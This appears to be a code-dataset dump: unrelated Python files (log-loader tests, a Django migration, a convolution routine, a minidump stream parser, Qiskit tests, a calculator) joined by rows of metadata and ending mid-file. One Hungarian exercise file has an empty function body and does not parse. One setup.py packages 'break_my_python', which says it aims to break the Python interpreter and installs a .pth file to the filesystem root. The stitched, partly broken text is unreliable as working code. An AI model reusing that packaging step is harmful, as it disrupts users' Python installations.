class LoadBinTestCase(unittest.TestCase):
def test_LoadBinLogAll(self):
data = LoadBinLog("../tests/log_0_2020-5-1-14-53-42.bin")
self.assertGreater(len(data), 0, "no data")
def test_LoadBinLogString(self):
data = LoadBinLog("../tests/log_0_2020-5-1-14-53-42.bin", "RCOU")
self.assertEqual(len(data), 822, "no data")
def test_LoadBinLogStringArray(self):
data = LoadBinLog("../tests/log_0_2020-5-1-14-53-42.bin", ["RCOU", "ATT"])
self.assertEqual(len(data), 1644, "no data")
def test_SepalteRCIN6Para(self):
data = LoadBinLog("../tests/log_13_2020-5-13-15-45-02.bin", ["RCOU", "ATT", "RCIN"])
dict = data.seplateRCIN6Param()
for item in dict:
print("data"+item)
self.assertEqual(len(data), 1644, "no data")
if __name__ == '__main__':
unittest.main()
| 31.931034 | 92 | 0.637149 | 126 | 926 | 4.507937 | 0.388889 | 0.049296 | 0.126761 | 0.161972 | 0.394366 | 0.348592 | 0.348592 | 0.235915 | 0.235915 | 0.235915 | 0 | 0.091521 | 0.197624 | 926 | 28 | 93 | 33.071429 | 0.672948 | 0 | 0 | 0.1 | 0 | 0 | 0.224622 | 0.157667 | 0 | 0 | 0 | 0 | 0.2 | 1 | 0.2 | false | 0 | 0.1 | 0 | 0.35 | 0.05 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0ce7201689d9142cf85fb513dc2bf55a86b13523 | 475 | py | Python | car/migrations/0004_sale_cc.py | jobkarani/carnect | 8675d025e56fc07439b88e873e72a21cbbe747a9 | [
"MIT"
] | null | null | null | car/migrations/0004_sale_cc.py | jobkarani/carnect | 8675d025e56fc07439b88e873e72a21cbbe747a9 | [
"MIT"
] | null | null | null | car/migrations/0004_sale_cc.py | jobkarani/carnect | 8675d025e56fc07439b88e873e72a21cbbe747a9 | [
"MIT"
] | null | null | null | # Generated by Django 3.2.9 on 2022-01-10 12:39
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('car', '0003_auto_20220110_1507'),
]
operations = [
migrations.AddField(
model_name='sale',
name='cc',
field=models.CharField(default=django.utils.timezone.now, max_length=100),
preserve_default=False,
),
]
| 22.619048 | 86 | 0.621053 | 54 | 475 | 5.351852 | 0.777778 | 0.076125 | 0.131488 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.097701 | 0.267368 | 475 | 20 | 87 | 23.75 | 0.732759 | 0.094737 | 0 | 0 | 1 | 0 | 0.074766 | 0.053738 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.142857 | 0 | 0.357143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0ce87ae6e8e21068ebe0de253baf4eb583ece22f | 701 | py | Python | conv.py | aenco9/HCAP2021 | d194ba5eab7e361d67f6de3c62f9f17f896ebcf3 | [
"MIT"
] | null | null | null | conv.py | aenco9/HCAP2021 | d194ba5eab7e361d67f6de3c62f9f17f896ebcf3 | [
"MIT"
] | null | null | null | conv.py | aenco9/HCAP2021 | d194ba5eab7e361d67f6de3c62f9f17f896ebcf3 | [
"MIT"
] | null | null | null | import numpy as np
def convolucion(Ioriginal, kernel):
'''Método encargado de realizar una convolución a una imagen
Entrada:
Ioriginal - imagen original en forma de matríz
kernel - kernel para barrer la imagen
Salida:
res - imagen resultante'''
#fr - filas, cr - columnas
fr = len(Ioriginal)-(len(kernel)-1)
cr = len(Ioriginal[0])-(len(kernel[0])-1)
res = np.zeros((fr, cr))
#filas, matríz resultado
for i in range(len(res)):
#columnas, matríz resultado
for j in range(len(res[0])):
suma = 0
#filas, kernel
for m in range(len(kernel)):
#columnas, kernel
for n in range(len(kernel[0])):
suma += kernel[m][n] * Ioriginal[m+i][n+j]
res[i][j] = suma
return res | 26.961538 | 61 | 0.664765 | 111 | 701 | 4.198198 | 0.405405 | 0.077253 | 0.085837 | 0.055794 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012389 | 0.194009 | 701 | 26 | 62 | 26.961538 | 0.812389 | 0.410842 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.038462 | 0 | 1 | 0.076923 | false | 0 | 0.076923 | 0 | 0.230769 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0ce945d91f14b7115bc5eeecc89a0cbddf6f0ae2 | 2,925 | py | Python | radical_translations/agents/tests/test_models.py | kingsdigitallab/radical_translations | c18ca1ccc0ab2d88ae472dc2eda58e2ff9dcc76a | [
"MIT"
] | 3 | 2022-02-08T18:03:44.000Z | 2022-03-18T18:10:43.000Z | radical_translations/agents/tests/test_models.py | kingsdigitallab/radical_translations | c18ca1ccc0ab2d88ae472dc2eda58e2ff9dcc76a | [
"MIT"
] | 19 | 2020-05-11T15:36:35.000Z | 2022-02-08T11:26:40.000Z | radical_translations/agents/tests/test_models.py | kingsdigitallab/radical_translations | c18ca1ccc0ab2d88ae472dc2eda58e2ff9dcc76a | [
"MIT"
] | null | null | null | from collections import defaultdict
import pytest
from radical_translations.agents.models import Organisation, Person
pytestmark = pytest.mark.django_db
@pytest.mark.usefixtures("vocabulary")
class TestOrganisation:
def test_agent_type(self, title):
obj = Person(name="person name")
obj.save()
assert obj.agent_type == "person"
obj = Organisation(name="organisation name")
obj.save()
assert obj.agent_type == "organisation"
def test_from_gsx_entry(self):
assert Organisation.from_gsx_entry(None) is None
entry = defaultdict(defaultdict)
entry["gsx$organisation"]["$t"] = ""
assert Organisation.from_gsx_entry(entry) is None
entry["gsx$organisation"]["$t"] = "Organisation 1"
assert Organisation.from_gsx_entry(entry) is not None
entry["gsx$type"]["$t"] = "Publisher"
assert Organisation.from_gsx_entry(entry) is not None
entry["gsx$location"]["$t"] = "0001: London [UK]"
assert Organisation.from_gsx_entry(entry) is not None
assert Organisation.objects.count() == 1
@pytest.mark.usefixtures("vocabulary")
class TestPerson:
def test_from_gsx_entry(self):
assert Person.from_gsx_entry(None) is None
entry = defaultdict(defaultdict)
entry["gsx$name"]["$t"] = ""
assert Person.from_gsx_entry(entry) is None
entry["gsx$name"]["$t"] = "Person 1"
assert Person.from_gsx_entry(entry) is not None
entry["gsx$gender"]["$t"] = "f"
p = Person.from_gsx_entry(entry)
assert p is not None
assert p.gender == "f"
entry["gsx$birth"]["$t"] = "1790"
p = Person.from_gsx_entry(entry)
assert p is not None
assert p.date_birth.date_display == "1790"
entry["gsx$locationsresidence"]["$t"] = "0001: London [UK]; 0002: Paris [FR]"
p = Person.from_gsx_entry(entry)
assert p is not None
assert "London" in p.based_near.first().address
assert "Paris" in p.based_near.last().address
entry["gsx$locationbirth"]["$t"] = "0001: London [UK]"
p = Person.from_gsx_entry(entry)
assert p is not None
assert "London" in p.place_birth.address
entry["gsx$locationdeath"]["$t"] = "0002: Paris [FR]"
p = Person.from_gsx_entry(entry)
assert p is not None
assert "Paris" in p.place_death.address
entry["gsx$occupations"]["$t"] = "tester"
p = Person.from_gsx_entry(entry)
assert p is not None
assert "tester" in p.roles.first().label.lower()
entry["gsx$organisations"]["$t"] = "Organisation 1"
p = Person.from_gsx_entry(entry)
assert p is not None
entry["gsx$collaborators"]["$t"] = "Person 2; Person 3"
p = Person.from_gsx_entry(entry)
assert p is not None
assert Person.objects.count() == 3
| 31.793478 | 85 | 0.624274 | 379 | 2,925 | 4.686016 | 0.195251 | 0.070946 | 0.121622 | 0.134009 | 0.573198 | 0.518018 | 0.518018 | 0.429054 | 0.394144 | 0.350225 | 0 | 0.015895 | 0.247179 | 2,925 | 91 | 86 | 32.142857 | 0.790645 | 0 | 0 | 0.409091 | 0 | 0 | 0.163419 | 0.007521 | 0 | 0 | 0 | 0 | 0.409091 | 1 | 0.045455 | false | 0 | 0.045455 | 0 | 0.121212 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0ceb7ee6367f4094900b7a7ad37575ea6ba9548d | 5,680 | py | Python | minidump/streams/MiscInfoStream.py | lucasg/minidump | 18474e3221038abe866256e4e0eb255e33615110 | [
"MIT"
] | 1 | 2021-06-13T10:00:44.000Z | 2021-06-13T10:00:44.000Z | minidump/streams/MiscInfoStream.py | lucasg/minidump | 18474e3221038abe866256e4e0eb255e33615110 | [
"MIT"
] | null | null | null | minidump/streams/MiscInfoStream.py | lucasg/minidump | 18474e3221038abe866256e4e0eb255e33615110 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
#
# Author:
# Tamas Jos (@skelsec)
#
import io
import enum
#https://msdn.microsoft.com/en-us/library/windows/desktop/ms680388(v=vs.85).aspx
class MinidumpMiscInfo2Flags1(enum.IntFlag):
MINIDUMP_MISC1_PROCESS_ID = 0x00000001 #ProcessId is used.
MINIDUMP_MISC1_PROCESS_TIMES = 0x00000002 #ProcessCreateTime, ProcessKernelTime, and ProcessUserTime are used.
MINIDUMP_MISC1_PROCESSOR_POWER_INFO = 0x00000004 #ProcessorMaxMhz, ProcessorCurrentMhz, ProcessorMhzLimit, ProcessorMaxIdleState, and ProcessorCurrentIdleState are used.
# https://msdn.microsoft.com/en-us/library/windows/desktop/ms680389(v=vs.85).aspx
class MinidumpMiscInfoFlags1(enum.IntFlag):
MINIDUMP_MISC1_PROCESS_ID = 0x00000001 #ProcessId is used.
MINIDUMP_MISC1_PROCESS_TIMES = 0x00000002 #ProcessCreateTime, ProcessKernelTime, and ProcessUserTime are used.
# https://msdn.microsoft.com/en-us/library/windows/desktop/ms680389(v=vs.85).aspx
class MINIDUMP_MISC_INFO:
size = 24
def __init__(self):
self.SizeOfInfo = None
self.Flags1 = None
self.ProcessId = None
self.ProcessCreateTime = None
self.ProcessUserTime = None
self.ProcessKernelTime = None
def parse(buff):
mmi = MINIDUMP_MISC_INFO()
mmi.SizeOfInfo = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
mmi.Flags1 = MinidumpMiscInfoFlags1(int.from_bytes(buff.read(4), byteorder = 'little', signed = False))
if mmi.Flags1 & MinidumpMiscInfoFlags1.MINIDUMP_MISC1_PROCESS_ID:
mmi.ProcessId = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
else:
buff.read(4)
if mmi.Flags1 & MinidumpMiscInfoFlags1.MINIDUMP_MISC1_PROCESS_TIMES:
mmi.ProcessCreateTime = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
mmi.ProcessUserTime = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
mmi.ProcessKernelTime = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
else:
buff.read(12)
return mmi
#https://msdn.microsoft.com/en-us/library/windows/desktop/ms680388(v=vs.85).aspx
class MINIDUMP_MISC_INFO_2:
size = 44
def __init__(self):
self.SizeOfInfo = None
self.Flags1 = None
self.ProcessId = None
self.ProcessCreateTime = None
self.ProcessUserTime = None
self.ProcessKernelTime = None
self.ProcessorMaxMhz = None
self.ProcessorCurrentMhz = None
self.ProcessorMhzLimit = None
self.ProcessorMaxIdleState = None
self.ProcessorCurrentIdleState = None
def parse(buff):
mmi = MINIDUMP_MISC_INFO_2()
mmi.SizeOfInfo = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
mmi.Flags1 = MinidumpMiscInfo2Flags1(int.from_bytes(buff.read(4), byteorder = 'little', signed = False))
if mmi.Flags1 & MinidumpMiscInfo2Flags1.MINIDUMP_MISC1_PROCESS_ID:
mmi.ProcessId = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
else:
buff.read(4)
if mmi.Flags1 & MinidumpMiscInfo2Flags1.MINIDUMP_MISC1_PROCESS_TIMES:
mmi.ProcessCreateTime = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
mmi.ProcessUserTime = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
mmi.ProcessKernelTime = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
else:
buff.read(12)
if mmi.Flags1 & MinidumpMiscInfo2Flags1.MINIDUMP_MISC1_PROCESSOR_POWER_INFO:
mmi.ProcessorMaxMhz = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
mmi.ProcessorCurrentMhz = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
mmi.ProcessorMhzLimit = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
mmi.ProcessorMaxIdleState = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
mmi.ProcessorCurrentIdleState = int.from_bytes(buff.read(4), byteorder = 'little', signed = False)
else:
buff.read(20)
return mmi
class MinidumpMiscInfo:
def __init__(self):
self.ProcessId = None
self.ProcessCreateTime = None
self.ProcessUserTime = None
self.ProcessKernelTime = None
self.ProcessorMaxMhz = None
self.ProcessorCurrentMhz = None
self.ProcessorMhzLimit = None
self.ProcessorMaxIdleState = None
self.ProcessorCurrentIdleState = None
def parse(dir, buff):
t = MinidumpMiscInfo()
buff.seek(dir.Location.Rva)
chunk = io.BytesIO(buff.read(dir.Location.DataSize))
if dir.Location.DataSize == MINIDUMP_MISC_INFO.size:
misc = MINIDUMP_MISC_INFO.parse(chunk)
t.ProcessId = misc.ProcessId
t.ProcessCreateTime = misc.ProcessCreateTime
t.ProcessUserTime = misc.ProcessUserTime
t.ProcessKernelTime = misc.ProcessKernelTime
else:
misc = MINIDUMP_MISC_INFO_2.parse(chunk)
t.ProcessId = misc.ProcessId
t.ProcessCreateTime = misc.ProcessCreateTime
t.ProcessUserTime = misc.ProcessUserTime
t.ProcessKernelTime = misc.ProcessKernelTime
t.ProcessorMaxMhz = misc.ProcessorMaxMhz
t.ProcessorCurrentMhz = misc.ProcessorCurrentMhz
t.ProcessorMhzLimit = misc.ProcessorMhzLimit
t.ProcessorMaxIdleState = misc.ProcessorMaxIdleState
t.ProcessorCurrentIdleState = misc.ProcessorCurrentIdleState
return t
def __str__(self):
t = '== MinidumpMiscInfo ==\n'
t += 'ProcessId %s\n' % self.ProcessId
t += 'ProcessCreateTime %s\n' % self.ProcessCreateTime
t += 'ProcessUserTime %s\n' % self.ProcessUserTime
t += 'ProcessKernelTime %s\n' % self.ProcessKernelTime
t += 'ProcessorMaxMhz %s\n' % self.ProcessorMaxMhz
t += 'ProcessorCurrentMhz %s\n' % self.ProcessorCurrentMhz
t += 'ProcessorMhzLimit %s\n' % self.ProcessorMhzLimit
t += 'ProcessorMaxIdleState %s\n' % self.ProcessorMaxIdleState
t += 'ProcessorCurrentIdleState %s\n' % self.ProcessorCurrentIdleState
return t | 42.074074 | 170 | 0.757394 | 673 | 5,680 | 6.270431 | 0.139673 | 0.043602 | 0.040521 | 0.064455 | 0.709005 | 0.697393 | 0.686256 | 0.664929 | 0.64455 | 0.64455 | 0 | 0.028994 | 0.13169 | 5,680 | 135 | 171 | 42.074074 | 0.826642 | 0.116021 | 0 | 0.582609 | 0 | 0 | 0.065122 | 0.009189 | 0 | 0 | 0.009988 | 0 | 0 | 1 | 0.06087 | false | 0 | 0.017391 | 0 | 0.217391 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0cec7a7b14ee446e6efc190805ad0c86fcf9567d | 2,565 | py | Python | test/python/transpiler/test_transpile.py | filemaster/qiskit-terra | 8672c407a5a0e34405315f82d5ad5847916e857e | [
"Apache-2.0"
] | null | null | null | test/python/transpiler/test_transpile.py | filemaster/qiskit-terra | 8672c407a5a0e34405315f82d5ad5847916e857e | [
"Apache-2.0"
] | null | null | null | test/python/transpiler/test_transpile.py | filemaster/qiskit-terra | 8672c407a5a0e34405315f82d5ad5847916e857e | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright 2018, IBM.
#
# This source code is licensed under the Apache License, Version 2.0 found in
# the LICENSE.txt file in the root directory of this source tree.
# pylint: disable=redefined-builtin
"""Tests basic functionality of the transpile function"""
from qiskit import QuantumRegister, QuantumCircuit
from qiskit import compile, BasicAer
from qiskit.transpiler import PassManager, transpile_dag, transpile
from qiskit.tools.compiler import circuits_to_qobj
from qiskit.converters import circuit_to_dag
from ..common import QiskitTestCase
class TestTranspile(QiskitTestCase):
"""Test transpile function."""
def test_pass_manager_empty(self):
"""Test passing an empty PassManager() to the transpiler.
It should perform no transformations on the circuit.
"""
qr = QuantumRegister(2)
circuit = QuantumCircuit(qr)
circuit.h(qr[0])
circuit.h(qr[0])
circuit.cx(qr[0], qr[1])
circuit.cx(qr[0], qr[1])
circuit.cx(qr[0], qr[1])
circuit.cx(qr[0], qr[1])
dag_circuit = circuit_to_dag(circuit)
resources_before = dag_circuit.count_ops()
pass_manager = PassManager()
dag_circuit = transpile_dag(dag_circuit, pass_manager=pass_manager)
resources_after = dag_circuit.count_ops()
self.assertDictEqual(resources_before, resources_after)
def test_pass_manager_none(self):
"""Test passing the default (None) pass manager to the transpiler.
It should perform the default qiskit flow:
unroll, swap_mapper, cx_direction, cx_cancellation, optimize_1q_gates
and should be equivalent to using tools.compile
"""
qr = QuantumRegister(2, 'qr')
circuit = QuantumCircuit(qr)
circuit.h(qr[0])
circuit.h(qr[0])
circuit.cx(qr[0], qr[1])
circuit.cx(qr[0], qr[1])
circuit.cx(qr[0], qr[1])
circuit.cx(qr[0], qr[1])
coupling_map = [[1, 0]]
basis_gates = 'u1,u2,u3,cx,id'
backend = BasicAer.get_backend('qasm_simulator')
circuit2 = transpile(circuit, backend, coupling_map=coupling_map, basis_gates=basis_gates,
pass_manager=None)
qobj = compile(circuit, backend=backend, coupling_map=coupling_map, basis_gates=basis_gates)
qobj2 = circuits_to_qobj(circuit2, backend.name(), basis_gates=basis_gates,
coupling_map=coupling_map, qobj_id=qobj.qobj_id)
self.assertEqual(qobj, qobj2)
| 34.2 | 100 | 0.665107 | 332 | 2,565 | 4.975904 | 0.331325 | 0.021792 | 0.053269 | 0.058111 | 0.22276 | 0.22276 | 0.186441 | 0.186441 | 0.186441 | 0.127119 | 0 | 0.019857 | 0.234308 | 2,565 | 74 | 101 | 34.662162 | 0.821283 | 0.245224 | 0 | 0.35 | 0 | 0 | 0.016129 | 0 | 0 | 0 | 0 | 0 | 0.05 | 1 | 0.05 | false | 0.15 | 0.15 | 0 | 0.225 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
0cee3a5d83fc06ee8d80703cbf5bab61011eb8f9 | 7,039 | py | Python | repiko/module/calculator.py | liggest/RepiKoBot | 5a2aa511e747785ad341c60d809af2a2788963ab | [
"MIT"
] | 1 | 2021-07-29T13:23:58.000Z | 2021-07-29T13:23:58.000Z | repiko/module/calculator.py | liggest/RepiKoBot | 5a2aa511e747785ad341c60d809af2a2788963ab | [
"MIT"
] | null | null | null | repiko/module/calculator.py | liggest/RepiKoBot | 5a2aa511e747785ad341c60d809af2a2788963ab | [
"MIT"
] | null | null | null | import random
class Calculator():
symbol=["+","-","*","/","(",")"]
def __init__(self):
pass
def cal(self,s):
if self.isnumber(s[0]):
return s
elif s[0]=="error":
return ["error",s[1]]
elif "(" in s[0] or ")" in s[0]: #or "^" in s[0]:
el=self.analyze(s)
e=el[0]
log=el[1]
return self.cal([e,log])
else:
e=s[0]
log=s[1]
if "-" in e:
ex=e
for x in range(len(e)):
if e[x]=="-":
if x==0:
ex="–"+ex[1:]
elif e[x-1] in self.symbol:
ex=ex[:x]+"–"+ex[x+1:]
e=ex
if "*" in e or "/" in e:
length=len(e)
lastMark=-1
thisMark=0
nextMark=length
mark="*"
for x in range(length):
if e[x]=="*" or e[x]=="/":
thisMark=x
mark=e[x]
for y in range(thisMark+1,length):
if e[y] in self.symbol:
nextMark=y
break
for y in range(thisMark-1,-1,-1):
if e[y] in self.symbol:
lastMark=y
break
target_l=e[lastMark+1:thisMark].replace("–","-")
target_r=e[thisMark+1:nextMark].replace("–","-")
if not self.isnumber(target_l):
target=self.cal([target_l,log])
target_l=target[0]
log=target[1]
if not self.isnumber(target_r):
target=self.cal([target_r,log])
target_r=target[0]
log=target[1]
if target_r=="error" or target_l=="error":
return ["error",log]
if mark=="*":
result_temp=str(float(target_l)*float(target_r))
elif mark=="/" and target_r!="0":
result_temp=str(float(target_l)/float(target_r))
else:
return ["error",log]
e=e[:lastMark+1]+result_temp+e[nextMark:]
log=log+e+"\n"
break
elif "+" in e or "-" in e:
length=len(e)
lastMark=-1
thisMark=0
nextMark=length
mark="+"
for x in range(length):
if e[x]=="+" or e[x]=="-":
thisMark=x
mark=e[x]
for y in range(thisMark+1,length):
if e[y] in self.symbol:
nextMark=y
break
for y in range(thisMark-1,-1,-1):
if e[y] in self.symbol:
lastMark=y
break
target_l=e[lastMark+1:thisMark].replace("–","-")
target_r=e[thisMark+1:nextMark].replace("–","-")
if not self.isnumber(target_l):
target=self.cal([target_l,log])
target_l=target[0]
log=target[1]
if not self.isnumber(target_r):
target=self.cal([target_r,log])
target_r=target[0]
log=target[1]
if target_r=="error" or target_l=="error":
return ["error",log]
if mark=="+":
result_temp=str(float(target_l)+float(target_r))
elif mark=="-":
result_temp=str(float(target_l)-float(target_r))
else:
return ["error",log]
e=e[:lastMark+1]+result_temp+e[nextMark:]
log=log+e+"\n"
break
else:
return ["error",log]
return self.cal([e,log])
def analyze(self,s):
e=s[0]
log=s[1]
while "(" in e or ")" in e:
bracketL=0
bracketR=0
length=len(e)
for x in range(length-1,-1,-1):
if e[x]=="(":
bracketL=x
bracketR=e[x:].find(")")+x
break
rs=e[bracketL+1:bracketR]
log=log+rs+"\n"
result_temp=self.cal([rs,log])
if result_temp[0]=="error":
return ["error",result_temp[1]]
e=e[:bracketL]+result_temp[0]+e[bracketR+1:]
log=result_temp[1]+e+"\n"
return [e,log]
def isnumber(self,s):
try :
float(s)
return True
except:
return False
def dice(self,s):
e=s
while "d" in e:
length=len(e)
dn=e.find("d")
start=-1
end=length
for x in range(dn+1,length):
if not e[x].isdecimal():
end=x
break
for y in range(dn-1,-1,-1):
if not e[y].isdecimal():
start=y
break
startn=e[start+1:dn]
endn=e[dn+1:end]
if startn=="":
startn=1
else:
startn=abs(int(startn))
if endn=="":
endn=100
else:
endn=abs(int(endn))
if endn!=0 and startn<=100 and startn!=0:
result_temp="("
for z in range(startn):
result_temp+=str(random.randint(1,endn))
if z!=startn-1:
result_temp+="+"
result_temp+=")"
elif endn==0:
return "-丢了个卵子"
elif startn>100:
return "-丢了一群卵子"
elif startn==0:
return "-丢不出卵子,只能丢人了"
e=e[:start+1]+result_temp+e[end:]
return e
def dicetext(self,s,act):
text=self.dice(s)
if text[0:2]=="-丢":
return text[1:]
num=self.cal([text,text+"\n"])
if num[0]!="error":
return "投掷 "+act+" :"+s+" = "+text+" = "+num[0]
else:
return "呜…投个骰子都卡住了……"
#x=Calculator()
#a=input()
#r=x.cal([a,a+"\n"])
#print(r[1][:-1])
#if r[0]=="error":
# print("error")
#print(x.dicetext(a,""))
| 36.661458 | 76 | 0.356016 | 748 | 7,039 | 3.304813 | 0.118984 | 0.064725 | 0.024272 | 0.022249 | 0.542476 | 0.499191 | 0.492718 | 0.486246 | 0.486246 | 0.486246 | 0 | 0.025124 | 0.513709 | 7,039 | 191 | 77 | 36.853403 | 0.692667 | 0.018611 | 0 | 0.442623 | 0 | 0 | 0.025217 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.032787 | false | 0.005464 | 0.005464 | 0 | 0.15847 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0cf19d7af68dc81b523b12d529be9b1094af28ac | 891 | py | Python | setup.py | jjhelmus/break_my_python | 4f8165fa3ae2bbe72b21f49156598387ee18b94a | [
"BSD-3-Clause"
] | null | null | null | setup.py | jjhelmus/break_my_python | 4f8165fa3ae2bbe72b21f49156598387ee18b94a | [
"BSD-3-Clause"
] | null | null | null | setup.py | jjhelmus/break_my_python | 4f8165fa3ae2bbe72b21f49156598387ee18b94a | [
"BSD-3-Clause"
] | null | null | null | from setuptools import setup
with open('README.md') as f:
long_description = f.read()
setup(
name='break_my_python',
version='0.0.2',
description='This package tries to breaks your python interpreter, do not install it',
long_description=long_description,
author='Jonathan J. Helmus',
author_email='jjhelmus@gmail.com',
url='http://pypi.python.org/pypi/break_my_python/',
license='LICENSE.txt',
py_modules=['break_my_python'],
data_files=[('/', ['break_my_python.pth'])],
classifiers=[
'License :: OSI Approved :: BSD License',
'Programming Language :: Python',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
]
)
| 31.821429 | 90 | 0.655443 | 108 | 891 | 5.277778 | 0.583333 | 0.2 | 0.263158 | 0.136842 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.015278 | 0.191919 | 891 | 27 | 91 | 33 | 0.776389 | 0 | 0 | 0 | 0 | 0 | 0.571268 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.04 | 0 | 0.04 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
49078fb3338a8d88957f2187faa7b3d0420743af | 990 | py | Python | feladatok.py | python-feladatok-tesztekkel/-05-02-01-fuggvenyek-halado | 0528125ec429584b21a41635517a3c55dfba559a | [
"CC0-1.0"
] | null | null | null | feladatok.py | python-feladatok-tesztekkel/-05-02-01-fuggvenyek-halado | 0528125ec429584b21a41635517a3c55dfba559a | [
"CC0-1.0"
] | null | null | null | feladatok.py | python-feladatok-tesztekkel/-05-02-01-fuggvenyek-halado | 0528125ec429584b21a41635517a3c55dfba559a | [
"CC0-1.0"
] | null | null | null | # feladat.py
# 1. feladat
# Írjon függvényt szokoev_e néven
# A függvény térjen vissza igaz értékkel, ha a paraméterben megadott évszám szőköév
def szokoev_e(ev:int) -> bool:
# 2. feladat
# A függvény bemenő paraméterei az a, b, c egész számok
# Írjon kódot amely eredményeként az a változóba lesz a legnagyobb szám, a b változóba a második legnagyobb szám és a c változóba pedig a legkisebb szám.
def csokkeno(a:int, b:int, c:int)->tuple:
eredmeny=[a,b,c]
return eredmeny
# 3. feladat
# Készítsen palindrom-e nevű függvényt amely egy stringről megállapítja, hogy palidrom-e
# Tágabb értelembe a palindrom olyan szöveg vagy szókapcsolat, amely visszafelé olvasva is ugyanaz
def palindrom_e(mondat:str)->bool:
return True;
# 4. feladat
# Írjon függvényt amely meghatározza, hogy egy adott intervallumban hány négyzetszám van
# Pl. [1-9] intervallum esetén 1, 2, 3 négyzetei esnek, tehát három négyzetszám van
def negyzetszamok_szama(a:int, b:int)->int:
return 0
| 28.285714 | 153 | 0.756566 | 152 | 990 | 4.901316 | 0.565789 | 0.008054 | 0.056376 | 0.021477 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012195 | 0.171717 | 990 | 34 | 154 | 29.117647 | 0.896341 | 0.734343 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0b3087eb0d5de6a063260501def92d99d71d6436 | 397 | py | Python | setup.py | TechAtNYU/api-python | 26cfa78208f30c41095484422cd1232aeddbfcb2 | [
"MIT"
] | null | null | null | setup.py | TechAtNYU/api-python | 26cfa78208f30c41095484422cd1232aeddbfcb2 | [
"MIT"
] | null | null | null | setup.py | TechAtNYU/api-python | 26cfa78208f30c41095484422cd1232aeddbfcb2 | [
"MIT"
] | null | null | null | try:
from setuptools import setup
except ImportError:
